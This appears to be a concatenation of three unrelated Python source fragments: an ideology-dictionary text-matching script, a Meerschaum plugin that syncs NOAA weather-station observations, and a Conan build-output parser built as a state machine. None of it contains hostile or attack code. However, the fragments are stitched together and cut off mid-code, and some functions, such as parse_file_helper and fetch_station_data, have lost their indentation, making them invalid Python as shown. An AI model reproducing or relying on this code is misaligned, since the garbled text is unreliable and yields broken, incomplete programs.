rit_dict = load_dict(rit_dict, dicts_dir + "rit_dict.txt")
logging.info(str(len(all_ideol)) + " entries loaded into the combined ideology dictionary.")
list_dict = list(all_ideol)
list_dict.sort(key = lambda x: x.lower())
logging.info("First 10 elements of combined ideology dictionary are:\n" + str(list_dict[:10]))
# Create tuples for keyword lists and dictionary terms:
keys_tuple = tuple([mission_keywords,curriculum_keywords,philosophy_keywords,history_keywords,about_keywords,\
all_ideol,all_keywords])
dicts_tuple = tuple([ess_dict,prog_dict,rit_dict,all_dicts])
logging.info(str(list(keys_tuple)))
logging.info(str(list(dicts_tuple)))
# ### Define dictionary matching helper functions
def dict_count(text_list, custom_dict):
    """Performs dictionary analysis, returning number of dictionary hits found.

    Removes punctuation and stems the phrase being analyzed.
    Compatible with multiple-word dictionary elements.

    :param text_list: iterable of text chunks (each possibly several sentences long)
    :param custom_dict: collection of stemmed dictionary terms, possibly multi-word
    :return: tuple of (list with one dictionary-hit-stripped string per chunk,
             total number of matches found)
    """
    counts = 0  # number of matches between text_list and custom_dict
    dictless_list = []  # updated text_list with dictionary hits removed
    # Length (in words) of longest entry in the dictionary
    max_entry_length = max(len(entry.split()) for entry in custom_dict)
    for chunk in text_list:  # chunk may be several sentences or possibly paragraphs long
        chunk = re.sub(r'[^\w\s]', '', chunk)  # Remove punctuation, keeping only word chars and spaces
        # Do dictionary analysis for word chunks of lengths max_entry_length down to 1,
        # feeding the stripped chunk back in each time so longer dict entries are removed
        # first -- this prevents shorter entries contained inside them from matching again.
        # (Previously the original chunk was re-scanned at every length, double counting
        # nested entries and appending one partial result per length.)
        for length in range(max_entry_length, 0, -1):
            chunk, len_counts = dict_match_len(chunk, custom_dict, length)
            counts += len_counts
        dictless_list.append(chunk)
    return dictless_list, int(counts)
def dict_match_len(phrase, custom_dict, length):
    """Helper function to dict_match.

    Stems every ``length``-word window of ``phrase`` and checks it against
    ``custom_dict``. Returns the phrase with all matched windows removed,
    together with the number of matches found.
    """
    words = phrase.split()
    if len(words) < length:
        # Chunk is shorter than the dictionary entries being matched; nothing to do.
        return phrase, 0
    hit_starts = []  # start indices of matched windows
    hits = 0
    for start in range(len(words) - length + 1):
        candidate = stemmer.stem(" ".join(words[start:start + length]))
        if candidate in custom_dict:
            hit_starts.append(start)  # remember where the dictionary hit begins
            hits += 1
            logging.info(candidate)
    # Remove matches from right to left so earlier indices stay valid.
    for start in reversed(hit_starts):
        words = words[:start] + words[start + length:]
    return " ".join(words), hits
@timeout_decorator.timeout(20, use_signals=False)
def dictmatch_file_helper(file,dictsnames_biglist,all_keywords,all_ideol,all_matches):
    """Counts number of matches in file for each list of terms given, and also collects the terms not matched.

    Dictsnames_biglist is a list of lists, each list containing:
    a list of key terms, currently essentialism, progressivism, ritualism, and all three combined (ess_dict, prog_dict, rit_dict, all_dicts);
    the variables used to store the number of matches for each term list (ess_count, prog_count, rit_count, alldict_count);
    and the not-matches--that is, the list of words leftover from the file after all matches are removed (ess_dictless, prog_dictless, rit_dictless, alldict_dictless).

    Returns the updated dictsnames_biglist and the running total of matches across all dicts.
    """
    for i in range(len(dictsnames_biglist)): # Iterate over dicts to find matches with parsed text of file
        # Dicts are: (ess_dict, prog_dict, rit_dict, alldict_count); count_names are: (ess_count, prog_count, rit_count, alldict_count); dictless_names are: (ess_dictless, prog_dictless, rit_dictless, alldict_dictless)
        # adict,count_name,dictless_name = dictsnames_tupzip[i]
        # NOTE(review): `parsed_pagetext` is neither a parameter nor a local here;
        # it presumably is a module-level global populated by the parsing step --
        # confirm, otherwise this raises NameError when called before parsing.
        dictless_add,count_add = dict_count(parsed_pagetext,dictsnames_biglist[i][0])
        dictsnames_biglist[i][1] += count_add     # accumulate match count for this dict
        dictsnames_biglist[i][2] += dictless_add  # accumulate leftover (unmatched) text
        all_matches += count_add
        logging.info("Discovered " + str(count_add) + " matches for " + str(file) + ", a total thus far of " + str(dictsnames_biglist[i][1]) + " matches...")
    return dictsnames_biglist,all_matches
# ### Define parsing helper functions
@timeout_decorator.timeout(20, use_signals=False)
def parse_file_helper(file,webtext,keywords_text,ideology_text):
"""Parses file into (visible) webtext, both complete and filtered by terms in 'keywords' and 'ideology' lists."""
parsed_pagetext = []
parsed_pagetext = parsefile_by_tags(file) # Parse page text
if len(parsed_pagetext) == 0: # Don't waste time adding empty pages
logging.warning(" Nothing to parse in " + str(file) + "!")
else:
webtext.extend(parsed_pagetext) # Add new parsed | |
<reponame>bmeares/noaa
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
"""
Example script for syncing NOAA weather data
"""
from __future__ import annotations
from meerschaum.utils.typing import SuccessTuple, Dict, List, Any, Optional, Tuple
__version__ = '1.2.4'
# Third-party packages this Meerschaum plugin depends on (installed on demand).
required = [
    'requests', 'pytz',
]
def register(pipe: 'meerschaum.Pipe') -> Dict[str, Any]:
    """
    Prompt the user for stations when registering new pipes.

    Returns the initial parameters dictionary for the pipe, including the
    column roles and the interactively chosen NOAA stations.
    """
    parameters = {
        'columns': {'datetime': 'timestamp', 'id': 'station',},
        'noaa': {'stations': ask_for_stations(pipe),},
    }
    return parameters
def ask_for_stations(pipe, debug: bool = False) -> Dict[str, Any]:
    """
    Prompt the user for stations and return a dictionary.

    Station IDs (e.g. 'KATL') are fetched one at a time from the NOAA API;
    a two-letter entry is treated as a US state abbreviation and may expand
    to every station in that state.

    :param pipe: the Meerschaum pipe being registered.
    :param debug: verbosity toggle, passed through on recursion.
    :return: mapping of station ID -> {'name': ..., 'geometry': ...}.
    """
    import requests, json, re
    from meerschaum.utils.warnings import warn, info
    from meerschaum.utils.prompt import yes_no, prompt
    from meerschaum.utils.formatting import pprint
    instructions = f"""
    Visit https://www.weather.gov and use the local forecast search tool
    on the top left to find specific station IDs (e.g. 'KATL' for Atlanta).
    To fetch all stations from a state, enter the state abbreviation
    (e.g. 'GA' for Georgia).
    """
    info(instructions)
    stations = dict()
    while True:
        stationID = prompt("Enter station ID or state abbreviation, empty to stop: ", icon=False)
        if stationID == '':
            break
        if len(stationID) == 2:
            state_abbrev = stationID
            if yes_no(
                f"Are you sure you want to fetch from all stations in the state '{state_abbrev}'? " +
                "This will be very slow!"
            ):
                stations = get_state_stations(state_abbrev)
                break
            ### If declined, fall through and query the 2-letter string as a station ID.
        url = f"https://api.weather.gov/stations/{stationID}"
        ### NOTE: named `station_data` (not `info`) so it does not shadow the
        ### imported `info()` function above.
        station_data = json.loads(requests.get(url).text)
        try:
            geo = station_data['geometry']
        except Exception:
            geo = None
        try:
            name = station_data['properties']['name'].rstrip()
        except Exception:
            warn(f"Unable to fetch name for station '{stationID}'. Skipping...", stack=False)
            continue
        if not yes_no(f"Is '{name}' a good label for station '{stationID}'?"):
            name = prompt(f"New label for station '{stationID}': ", icon=False)
        stations[stationID] = dict()
        stations[stationID]['name'] = name
        if geo is not None:
            stations[stationID]['geometry'] = geo
    pprint(stations)
    if not yes_no(f"Would you like to register the above stations to pipe '{pipe}'?"):
        print("Resetting stations and starting over...")
        ### NOTE(review): assumes pipe.parameters already has a 'noaa' key --
        ### confirm this holds when registering a brand-new pipe.
        pipe.parameters['noaa']['stations'] = dict()
        return ask_for_stations(pipe, debug=debug)
    return stations
def get_stations(
        pipe: 'meerschaum.Pipe',
        debug: bool = False
    ) -> Dict[str, Any]:
    """
    Return the stations dictionary stored under the pipe's parameters,
    or ``None`` when the pipe has no stations registered (or malformed
    parameters).

    :param pipe: the Meerschaum pipe whose parameters are inspected.
    :param debug: verbosity toggle (currently unused).
    """
    try:
        return pipe.parameters['noaa']['stations']
    except Exception:
        ### Missing keys or a non-dict parameters object both mean "no stations".
        return None
def get_state_stations(
        state_abbrev : str,
        debug : bool = False
    ) -> dict:
    """
    Parse every station in a state.

    Queries the NOAA stations endpoint filtered by state and returns a
    mapping of station ID -> {'name': ..., 'geometry': ...}. Records that
    cannot be parsed are skipped with a warning.

    :param state_abbrev: two-letter US state abbreviation, e.g. 'GA'.
    :param debug: verbosity toggle (currently unused).
    """
    from meerschaum.utils.warnings import warn
    import requests, json
    url = "https://api.weather.gov/stations"
    stations = dict()
    print(f"Retrieving stations for state '{state_abbrev}'...")
    d = json.loads(requests.get(url, params={'state' : state_abbrev}).text)
    if 'features' not in d:
        warn(f"No stations retrieved for state '{state_abbrev}'.", stack=False)
        return stations
    for f in d['features']:
        stationID = None
        try:
            stationID = f['id'].split('/stations/')[-1]
            geo = f.get('geometry', None)
            name = f['properties']['name'].strip()
        except Exception:
            ### Always skip unparseable records; only warn when we at least
            ### know which station failed. (Previously a failure before
            ### stationID was set could fall through with undefined values.)
            if stationID is not None:
                warn(f"Could not determine name for station '{stationID}'. Skipping...")
            continue
        stations[stationID] = {'name': name, 'geometry': geo}
    return stations
def sync(
        pipe: 'meerschaum.Pipe',
        debug: bool = False,
        blocking: bool = True,
        workers: Optional[int] = None,
        **kw
    ) -> SuccessTuple:
    """
    Fetch JSON data from NOAA and sync it into a Pipe.
    Overrides the default Meerschaum sync function.

    :param pipe: the Meerschaum pipe to sync into.
    :param debug: verbosity toggle.
    :param blocking: forwarded to ``pipe.sync()``.
    :param workers: thread count; defaults to half the station count plus one.
    :return: tuple of (success flag, human-readable summary message).
    """
    from multiprocessing.pool import ThreadPool
    from meerschaum.utils.debug import dprint
    from meerschaum.utils.warnings import warn, info
    ### Specify the columns in case Pipe is not registered.
    ### NOTE: Normally the Pipe's columns' types are determined by the first dataframe encountered.
    ### In this script, we cast everything to floats to avoid integers.
    if not pipe.columns:
        pipe.columns = {
            "datetime" : "timestamp",
            "id" : "station",
        }
        pipe.edit(interactive=False, debug=debug)
    ### dictionary of NOAA weather stations and names
    ### NOTE(review): get_stations() can return None for an unregistered pipe,
    ### which would make len(stations) below raise TypeError -- confirm stations
    ### are always registered before syncing.
    stations = get_stations(pipe, debug=debug)
    if workers is None:
        workers = int(len(stations) / 2) + 1
    ### Fetch data from the stations.
    try:
        pool = ThreadPool(workers)
    except Exception as e:
        print(e)
        pool = None
    args = [(stationID, info, pipe) for stationID, info in stations.items()]
    ### Fall back to serial fetching when the thread pool could not be created.
    dataframes = (
        dict(pool.starmap(do_fetch, args)) if pool is not None
        else dict([do_fetch(*a) for a in args])
    )
    if pool is not None:
        pool.close()
        pool.join()
    ### only keep the common columns (skipping empty dataframes)
    common_cols = None
    for stationID, df in dataframes.items():
        if df is None: continue
        # print(df)
        if len(df.columns) == 0: continue
        # df.rename(columns=(lambda x : x.lstrip().rstrip()), inplace=True)
        if common_cols is None:
            ### Seed the intersection with the first non-empty dataframe's columns.
            common_cols = list(set(df.columns))
            continue
        try:
            common_cols = list(set(common_cols) & set(df.columns))
        except Exception as e:
            warn(str(e))
    ### Make empty set in case all dataframes are empty.
    if common_cols is None: common_cols = list()
    ### Pandas needs the columns to be in the same order, so sort the columns.
    common_cols.sort()
    ### Cast all but these columns to floats.
    non_float_cols = sorted(list({'label', 'timestamp', 'station', 'location', 'geometry'}))
    float_cols = sorted(list(set(common_cols) - set(non_float_cols)))
    ### Cast the value columns to floats to avoid integers.
    _dataframes = dict()
    for stationID, df in dataframes.items():
        if df is not None:
            try:
                ### Only keep commons columns and ensure they are sorted.
                if debug:
                    dprint(f"Common columns: {common_cols}")
                df = df[common_cols]
                df[float_cols] = df[float_cols].astype('float')
            except Exception as e:
                if debug:
                    warn(str(e))
                warn(
                    f"Unable to parse data from station '{stationID}' " +
                    f"({stations[stationID]['name']})",
                    stack = False
                )
                ### Drop this station's data entirely rather than sync bad rows.
                df = None
        _dataframes[stationID] = df
    dataframes = _dataframes
    ### Make sure Pipe exists.
    ### Normally this is handled when syncing for the first time, but threading breaks things.
    if not pipe.exists(debug=debug):
        for stationID, df in dataframes.items():
            if df is not None:
                if len(df) > 0:
                    ### Seed the pipe with a single row so the table schema exists.
                    pipe.sync(df.head(1), force=True, debug=debug)
                    break
    ### Finally, time to sync the dataframes.
    ### pipe.sync returns a tuple of success bool and message.
    ### E.g. (True, "Success") or (False, "Error message")
    success_dict = dict()
    for stationID, df in dataframes.items():
        info(f"Syncing data from station '{stationID}' ({stations[stationID]['name']})...")
        kw.update({
            'blocking' : blocking, 'workers' : workers, 'debug' : debug,
        })
        success = pipe.sync(df, **kw)[0] if df is not None else False
        success_dict[stationID] = success
    succeeded, failed = 0, 0
    for stationID, success in success_dict.items():
        if not success:
            warn(
                f"Failed to sync from station '{stationID}' ({stations[stationID]['name']})",
                stack = False
            )
            failed += 1
        else:
            succeeded += 1
    return (succeeded > 0), f"Synced from {succeeded + failed} stations, {failed} failed."
def do_fetch(
        stationID : str,
        info : dict,
        pipe : 'meerschaum.Pipe'
    ) -> Tuple[str, Optional[Dict[str, List[Any]]]]:
    """
    Wrapper for fetch_station_data (below).

    Catches any exception so that a single failing station cannot kill the
    thread pool; failures are reported as (stationID, None).

    :param stationID: NOAA station ID, e.g. 'KATL'.
    :param info: the station's metadata dictionary (must contain 'name').
    :param pipe: the Meerschaum pipe being synced.
    :return: tuple of (stationID, dataframe or None on failure).
    """
    from meerschaum.utils.warnings import warn
    try:
        df = fetch_station_data(stationID, info, pipe)
    except Exception as e:
        msg = str(e)
        warn(f"Failed to sync station '{stationID}' ({info['name']}). Error:\n{msg}")
        df = None
    return stationID, df
def fetch_station_data(
stationID : str,
info : dict,
pipe : meerschaum.Pipe
) -> Optional[Dict[str, List[Any]]]:
"""
Fetch JSON for a given stationID from NOAA and parse into a dataframe
"""
from meerschaum.utils.packages import import_pandas
from meerschaum.utils.misc import parse_df_datetimes
from meerschaum.utils.warnings import warn
import json, pytz, datetime, requests
pd = import_pandas()
### Get the latest sync time for this station so we don't request duplicate data.
try:
start = (
pipe.get_sync_time(
{ "station" : stationID }
) - datetime.timedelta(hours=24)
).replace(
tzinfo = pytz.timezone('UTC')
).isoformat()
except Exception as e:
start = None
### fetch JSON from NOAA since the start time (sync_time for this stationID)
if start:
print(
f"Fetching data newer than {start} for station '{stationID}' ({info['name']})...",
flush = True
)
else:
print(
f"Fetching all possible data for station '{stationID}' ({info['name']})...",
flush = True
)
url = f"https://api.weather.gov/stations/{stationID}/observations/"
response = None
try:
response = requests.get(url, params={"start":start})
data = json.loads(response.text)
except Exception as e:
print(f"\nFailed to parse JSON with exception: {e}", flush=True)
if response is not None:
print("Received text:\n" + response.text)
return None
print(f"Done fetching data for station '{stationID}' ({info['name']}).", flush=True)
### build a dictionary from the JSON response (flattens JSON)
d = dict()
if 'features' not in data:
warn(
f"Failed to fetch data for station '{stationID}' ({info['name']}):\n" + str(data),
stack = False
)
return None
for record in data['features']:
properties = record['properties']
if 'location' not in d:
d['location'] = []
d['location'].append(info['name'])
if 'geometry' not in d:
d['geometry'] = []
geo = None
if 'geometry' in info:
geo = json.dumps(info['geometry'])
d['geometry'].append(geo)
for col, v in properties.items():
### Specific to this API; filter out features we don't want.
if not v:
continue
### At this point, the timestamp is a string.
### It will get casted below in `parse_df_datetimes`.
if col == 'timestamp':
val = v
### We could just use the stationID provided, but it's given in the JSON
### so we might as well | |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import argparse
import logging
import os
import platform
import re
import sys
import tempfile
from collections import defaultdict
from contextlib import suppress
from functools import partial
from io import StringIO
from itertools import chain
from operator import itemgetter
from pathlib import Path
from subprocess import PIPE
from textwrap import indent
from typing import (
Any,
Callable,
Dict,
Iterable,
Iterator,
List,
Match,
Optional,
Set,
TextIO,
Tuple,
Type,
cast,
)
from psutil import Popen, Process
from . import __version__
from . import conan
from . import json
from .buildmon import BuildMonitor
from .conan import LOG as CONAN_LOG
from .logging import (
UniqueLogger,
get_logger,
init as initialize_logging,
level_from_name,
logger_escape_code,
)
from .regex import (
DECOLORIZE_REGEX,
REF_REGEX,
compact_pattern,
filter_by_regex,
shorten_conan_path,
)
from .utils import (
ProcessStreamHandler,
ScreenWriter,
StrictConfigParser,
added_first,
get_terminal_width,
shorten,
unique,
)
from .warnings import (
LOG as BLOG,
Regex,
levelname_from_severity,
warnings_from_matches,
)
CONMON_LOG = get_logger("CONMON")
# Deduplicating wrapper around the Conan logger (suppresses repeated messages).
CONAN_LOG_ONCE = UniqueLogger(CONAN_LOG)
# Names of all ancestor processes; used to guess the invoking shell for hints.
PARENT_PROCS = [parent.name() for parent in Process(os.getppid()).parents()]
# Insertion-ordered "set" (dict with None values) of one-time hint messages.
LOG_HINTS: Dict[str, None] = {}
def filehandler(key: str, mode="w", hint="") -> TextIO:
    """Open the log file configured under ``key``, or ``os.devnull`` when unset.

    When a path is configured, its parent directory is created and a one-time
    "saved ... to ..." hint is recorded. Otherwise a shell-specific hint is
    recorded describing how to enable the file via an environment variable.
    """
    path = conan.conmon_setting(key)
    if isinstance(path, str):
        Path(path).parent.mkdir(parents=True, exist_ok=True)
        if hint:
            LOG_HINTS.setdefault(f"saved {hint} to {path!r}")
    elif hint:
        env_key = f"CONMON_{key.upper()}"
        hint_path = key.replace("_", ".")
        # Pick the export syntax matching the closest known ancestor shell.
        shell_formats = {
            "bash": "export {}={}",
            "powershell.exe": "$env:{}='{}'",
            "cmd.exe": "set {}={}",
        }
        fmt = "export {}={}"
        for name in PARENT_PROCS:
            if name in shell_formats:
                fmt = shell_formats[name]
                break
        template = f"hint: execute {fmt!r} to save {{}}"
        LOG_HINTS.setdefault(template.format(env_key, hint_path, hint))
    return open(path or os.devnull, mode=mode, encoding="utf-8")
class State:
    """Base class for one parser state; subclasses decide when they activate
    and how they consume parsed log lines."""

    def __init__(self, parser: "ConanParser"):
        self.finished = False  # True once this state has released control
        self.stopped = False   # True once this state may never run again
        self.screen = parser.screen

    def deactivate(self):
        # Must only be called on a state that is still in control.
        assert self.finished is False
        self._deactivate(final=False)
        assert self.finished is True

    def _deactivate(self, final=False):
        # Subclasses override this to flush buffered output before finishing.
        self.finished = True
        self.stopped = final

    def activated(self, parsed_line: Match) -> bool:
        raise NotImplementedError

    def process(self, parsed_line: Match) -> None:
        raise NotImplementedError
class StateMachine:
    """Dispatches parsed log lines to the currently active parser State(s).

    States live in up to three pools:
      * running -- constructed and eligible to (re)activate,
      * active  -- currently consuming lines,
      * stopped -- permanently done (removed from running on deactivation).
    """

    def __init__(self, parser: "ConanParser"):
        self.screen = parser.screen
        self.parser = parser
        self._active: Set[State] = set() # currently active
        self._running: List[State] = [] # can be executed
        self._default: Optional[State] = None  # fallback when nothing is active

    def add(self, state: State):
        # A permanently stopped state may never be re-added; no duplicates.
        assert not state.stopped
        assert state not in self.running_instances()
        self._running.append(state)
        return state

    def setdefault(self, state: Optional[State]):
        # The default state also participates in the normal running pool.
        self._default = state
        if state:
            self.add(state)

    @property
    def active_classes(self) -> Tuple[Type[State], ...]:
        """Types of all currently active states."""
        return tuple(type(instance) for instance in self._active)

    def active_instance(self) -> Optional[State]:
        # Return an arbitrary active state (set iteration order), or None.
        for state in self._active:
            return state
        return None

    def running_instances(self) -> Tuple[State, ...]:
        return tuple(self._running)

    def activate(self, state: State):
        state.finished = False
        self._active.add(state)

    def deactivate(self, state: State):
        # Let the state flush via its _deactivate() hook before removal.
        if not state.finished:
            state.deactivate()
        self._active.remove(state)
        if state.stopped:
            # A state that stopped for good also leaves the running pool.
            self._running.remove(state)

    def deactivate_all(self):
        for state in tuple(self._active):
            self.deactivate(state)

    def process_hooks(self, parsed_line: Match) -> None:
        """Feed one parsed line to the active states, then check activations."""
        activated = []
        # 1) Let active states consume the line; drop those that finish.
        for state in tuple(self._active):
            if not state.finished:
                state.process(parsed_line)
            if state.finished:
                self.deactivate(state)
        # 2) Ask the remaining runnable states whether this line activates them.
        for state in tuple(self._running):
            if state not in self._active and state.activated(parsed_line):
                activated.append(state)
        if activated:
            if len(activated) > 1:
                CONMON_LOG.warning(
                    "overlapping states: %s",
                    ", ".join(type(state).__name__ for state in activated),
                )
            # Newly activated states preempt whatever was active before.
            self.deactivate_all()
            for state in activated:
                self.activate(state)
        # 3) Fall back to the default state when nothing claimed the line.
        if not self._active and self._default and not self._default.stopped:
            self.activate(self._default)
            self._default.process(parsed_line)
class Default(State):
    """Fallback state: echoes generic output lines and remembers the most
    recently seen package reference."""

    def __init__(self, parser: "ConanParser"):
        super().__init__(parser)
        self.parser = parser
        self.overwrite = False  # overwrite screen lines once the install phase begins
        self.last_ref = None    # most recently seen package reference

    def activated(self, parsed_line: Match) -> bool:
        # Never self-activates; the StateMachine activates it as the default.
        return False

    def process(self, parsed_line: Match) -> None:
        line, ref, rest = parsed_line.group(0, "ref", "rest")
        download = re.fullmatch(r"Downloading conan\w+\.[a-z]{2,3}", line)
        if rest.startswith("Installing (downloading, building) binaries..."):
            self.overwrite = True
        if download:
            target_log = self.parser.getdefaultlog(self.last_ref)
            self.screen.print(f"{download.group()} for {self.last_ref} ", overwrite=True)
        elif ref:
            self.last_ref = ref
            target_log = self.parser.getdefaultlog(ref)
            self.screen.print(f"{line} ", overwrite=True)
        else:
            target_log = self.parser.log
            self.screen.print(f"{line} ", overwrite=self.overwrite)
        target_log.setdefault("stdout", []).append(line)
        self.deactivate()
class Requirements(State):
    """Parses the 'Requirements' / 'Build requirements' sections of conan output."""

    def __init__(self, parser: "ConanParser"):
        super().__init__(parser)
        self.log = parser.log.setdefault("requirements", defaultdict(dict))
        self.stdout = parser.log.setdefault("stdout", [])
        pattern, flags = compact_pattern(REF_REGEX)
        # Matches e.g. "    pkg/1.0 from 'remote' - Cache"
        self.regex = re.compile(
            rf" +{pattern} from (?P<remote>'?[\w\- ]+'?) +- +(?P<status>\w+)", flags
        )
        self.req: List[Dict[str, Optional[str]]] = []  # rows collected for this section
        self.indent_ref = 0  # widest ref seen so far, for column alignment

    def activated(self, parsed_line: Match) -> bool:
        full_line, line = parsed_line.group(0, "rest")
        if line in {"Requirements", "Build requirements"}:
            self.screen.print(line)
            self.stdout.append(full_line)
            return True
        return False

    def process(self, parsed_line: Match) -> None:
        line = parsed_line.group(0)
        match = self.regex.match(line)
        if not match:
            # First non-requirement line ends the section.
            self.deactivate()
            return
        self.req.append(match.groupdict())
        self.stdout.append(line)
        # Record everything except the full ref and status under the package name.
        mapping = {
            key: value
            for key, value in match.groupdict().items()
            if key not in {"ref", "status"}
        }
        name = mapping.pop("name")
        self.log.setdefault(name, {}).update(mapping)

    def _deactivate(self, final=False):
        self.indent_ref = max(
            [self.indent_ref, *(len(item["ref"]) for item in self.req)]
        )
        # Print the collected rows sorted by status, remote, then ref, aligned.
        for item in sorted(self.req, key=itemgetter("status", "remote", "ref")):
            self.screen.print(
                f"  {item['status']:^10} {item['ref']:{self.indent_ref}} from "
                f"{item['remote']}"
            )
        self.req.clear()
        # final=False on purpose: the state must be able to activate again for
        # the "Build requirements" section later in the log.
        super()._deactivate(final=False)
class Packages(State):
    """Parses the 'Packages' / 'Build requirements packages' sections of conan
    output, recording each package's binary ID."""

    def __init__(self, parser: "ConanParser"):
        super().__init__(parser)
        self.log = parser.log.setdefault("requirements", defaultdict(dict))
        self.stdout = parser.log.setdefault("stdout", [])
        pattern, flags = compact_pattern(REF_REGEX)
        # Matches e.g. "    pkg/1.0:0123abcd... - Build"
        self.regex = re.compile(
            rf" +{pattern}:(?P<package_id>[a-z0-9]+) +- +(?P<status>\w+)", flags
        )
        self.pkg: List[Dict[str, Optional[str]]] = []  # rows collected for this section
        self.indent_ref = 0  # widest ref seen so far, for column alignment

    def activated(self, parsed_line: Match) -> bool:
        header, body = parsed_line.group(0, "rest")
        if body not in {"Packages", "Build requirements packages"}:
            return False
        self.screen.print(body)
        self.stdout.append(header)
        return True

    def process(self, parsed_line: Match) -> None:
        raw_line = parsed_line.group(0)
        row = self.regex.match(raw_line)
        if row is None:
            # First non-package line ends the section.
            self.deactivate()
            return
        self.pkg.append(row.groupdict())
        self.stdout.append(raw_line)
        name, package_id = row.group("name", "package_id")
        self.log.setdefault(name, {}).update(
            dict(package_id=package_id, package_revision=None)
        )

    def _deactivate(self, final=False):
        widths = [self.indent_ref]
        widths.extend(len(entry["ref"]) for entry in self.pkg)
        self.indent_ref = max(widths)
        # Print the collected rows sorted by status then ref, aligned.
        for item in sorted(self.pkg, key=itemgetter("status", "ref")):
            self.screen.print(
                f"  {item['status']:^10} {item['ref']:{self.indent_ref}} {item['package_id']}"
            )
        self.pkg.clear()
        # Keep final=False so the state can run again for build requirements.
        super()._deactivate(final=False)
class Config(State):
    """Captures the multi-line 'Configuration:' (profile) block and parses it
    as an INI file into the parser's config log."""

    def __init__(self, parser: "ConanParser"):
        super().__init__(parser)
        self.lines: List[str] = []  # raw profile lines collected so far
        self.log = parser.log["config"]

    def activated(self, parsed_line: Match) -> bool:
        line = parsed_line.group("rest")
        return line == "Configuration:"

    def process(self, parsed_line: Match) -> None:
        line = parsed_line.group(0)
        # Stop when the line no longer looks like profile content. Precedence:
        # (inside an [env] section AND not KEY=... or blank) OR
        # (not a section header / "key: value" / "key=value" / blank line).
        if (
            "[env]" in self.lines
            and not re.match(r"\w+=|$", line)
            or not re.match(r"(\[[\w.-]+]$)|[^\s:]+\s*[:=]|$", line)
        ):
            self.deactivate()
        else:
            self.lines.append(line)

    def _deactivate(self, final=False):
        # Parse the collected block as an INI profile and store it per section.
        buffer = StringIO("\n".join(self.lines))
        config = StrictConfigParser()
        config.read_file(buffer, "profile.ini")
        for section in config.sections():
            self.log[section] = dict(config.items(section))
        # The configuration block appears only once per run: stop permanently.
        super()._deactivate(final=True)
class Package(State):
    """Tracks 'Calling package()' sections, extracting the package ID and the
    package revision from the subsequent output."""

    def __init__(self, parser: "ConanParser"):
        super().__init__(parser)
        self.parser = parser

    def activated(self, parsed_line: Match) -> bool:
        line, ref, rest = parsed_line.group(0, "ref", "rest")
        if rest != "Calling package()":
            return False
        self.screen.print(f"Packaging {ref}")
        self.parser.setdefaultlog(ref).setdefault("stdout", []).append(line)
        return True

    def process(self, parsed_line: Match) -> None:
        rest = parsed_line.group("rest")
        id_match = re.match(
            r"(?P<prefix>[\w ]+) '?(?P<id>[a-z0-9]{32,40})(?:[' ]|$)", rest
        )
        log = self.parser.defaultlog
        if id_match is None:
            # Ordinary package() output: keep it verbatim.
            log.setdefault("package", []).append(rest)
            return
        if id_match.group("prefix") == "Created package revision":
            # The revision line ends the packaging section.
            log["package_revision"] = id_match.group("id")
            self.deactivate()
            return
        log["package_id"] = id_match.group("id")

    def _deactivate(self, final=False):
        self.parser.setdefaultlog()
        super()._deactivate(final=False)
class Export(State):
    """Tracks the 'Exporting package recipe' section and captures the exported
    recipe revision."""

    def __init__(self, parser: "ConanParser"):
        super().__init__(parser)
        self.parser = parser

    def activated(self, parsed_line: Match) -> bool:
        return parsed_line.group("rest") == "Exporting package recipe"

    def process(self, parsed_line: Match) -> None:
        line, ref, rest = parsed_line.group(0, "ref", "rest")
        revision = re.match("Exported revision: (?P<recipe_revision>[a-f0-9]{32})", rest)
        log = self.parser.getdefaultlog(ref)
        if revision is None:
            # Ordinary export output: keep it verbatim.
            log.setdefault("export", []).append(line)
        else:
            log.update(revision.groupdict())
            self.deactivate()

    def _deactivate(self, final=False):
        self.parser.setdefaultlog()
        # Exporting happens once per run: stop this state permanently.
        super()._deactivate(final=True)
class Build(State):
MAX_WIDTH = 65
PROC_JSON_RESET = False
_WARNINGS: Set[str] = set()
BUILD_STATUS_REGEX = re.compile(
r"""(?x)
(?:
(?P<status>
\[\ {0,2}\d+(?:%|[/\d]+) ] | \ +(?:CC|CCLD|CPPAS)(?=\ )
)? # ninja, cmake or automake
.*? # msbuild prints only the filename
)?
(?P<file>
[\-.\w/\\]+ (?(status) \.[a-z]{1,3}$ | \.(?:asm|cpp|cxx|cc?|[sS])$ )
)
"""
)
BUILD_STATUS_REGEX2 = re.compile(
r"""(?x)
(?P<status>$)? # should never match
.*\ [-/]c\ .*? # compile but don't link
(?P<file>
(?:[a-zA-Z]:)? [\-.\w/\\]+ \. (?:asm|cpp|cxx|cc?|[sS])
\b
)
"""
)
REF_LOG_KEY = "build"
def __init__(self, parser: "ConanParser"):
super().__init__(parser)
self.parser = parser
self.warnings = 0
self.buildmon = BuildMonitor(self.parser.process)
self.log = parser.defaultlog
self.ref = "???"
self.force_status = False
if not Build.PROC_JSON_RESET:
with filehandler("proc_json", hint="process debug json") as fh:
fh.write("{}")
Build.PROC_JSON_RESET = True
def _activated(self, parsed_line: Match) -> bool:
line, self.ref = parsed_line.group("rest", "ref")
if line == "Calling build()":
self.screen.print(f"Building {self.ref}")
return True
return False
@staticmethod
def _deactivated(parsed_line: Match) -> bool:
line = parsed_line.group("rest")
match = re.fullmatch(r"Package '\w+' built", line)
return bool(match) or line.startswith("ERROR:")
def activated(self, parsed_line: Match) -> bool:
full_line, ref = parsed_line.group(0, "ref")
if self._activated(parsed_line):
defaultlog = self.parser.getdefaultlog(ref)
defaultlog.setdefault("stdout", []).append(full_line)
self.log = self.parser.defaultlog = defaultlog.setdefault(
self.REF_LOG_KEY, {}
)
self.log.setdefault("stdout", [])
self.buildmon.start()
return True
return False
def flush_warning_count(self):
if self.warnings and BLOG.isEnabledFor(logging.WARNING):
esc = logger_escape_code(BLOG, "WARNING")
self.screen.print(
f"{esc}{self.warnings:4} warning(s)",
indent=0,
)
self.warnings = 0
def process(self, parsed_line: Match) -> None:
if self._deactivated(parsed_line):
self.deactivate()
return
line = parsed_line.group("rest")
if not line:
return
self.log["stdout"].append(parsed_line.group())
match = self.BUILD_STATUS_REGEX.fullmatch(
line
) or self.BUILD_STATUS_REGEX2.match(line)
if match:
status, file = match.groups()
if status:
self.force_status = True
elif self.force_status:
return
self.flush_warning_count()
with suppress(ValueError, AttributeError):
_current, _total = status.strip("[]").split("/")
status = f"[{_current:>{len(_total)}}/{_total}]"
prefix = f"{status} " if status else ""
output = shorten(
file,
width=self.MAX_WIDTH,
template=f"{prefix}{{}} ",
